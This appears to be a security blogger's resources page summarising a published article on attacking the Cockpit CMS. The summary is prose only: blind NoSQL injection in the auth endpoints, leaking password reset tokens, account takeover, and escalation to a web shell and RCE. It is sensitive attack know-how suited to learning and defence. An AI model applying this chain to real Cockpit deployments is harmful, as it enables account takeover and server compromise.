Resources

People often ask me "How did you learn how to hack?" The answer: by reading. This page is a collection of the blog posts and other articles that I have accumulated over the years of my journey. Enjoy!

Cockpit is a headless CMS that takes an API-first approach. Think of Wordpress but API driven and not as popular.

The first vulnerability is a NoSQL injection in the /auth/check API. A parameter is taken in directly without any type check. So, by adding an array or other options, NoSQL conditionals and things can be used. This is a blind injection, as no data is directly returned.

The author discusses an error driven approach to steal users and other data from the table. Additionally, using a not-so well-known MongoDB function $func can be used to return data, such as a var_dump.

Two other NoSQL injections were found in the /auth/resetpassword and /auth/newpassword APIs. By using the var_dump from the previous step, we can dump all data from this table. Because this contains active password reset tokens, this is game over.

To compromise the account, we will combine the previous steps. First, use the first NoSQL injection to leak all of the users. Then, reset one of these users passwords. From there, use the auth endpoints NoSQL to get the token parameter for resetting passwords. Now, we have access to the hashed password, API key for the user or can reset their account password.

With the auth bypass, we want to pop a shell. As with a lot of PHP-based CMS platforms, simply uploading a WebShell via a file uploader can be done.

An additionally RCE bug exists that happens when concatenating strings for custom PHP code being executed. Don't do this!

This is an interesting article on exploiting NoSQL injection in the wild. Although this is a possibility, it is rarely discussed as an actual finding. Good to see actual exploitation and tricks for this.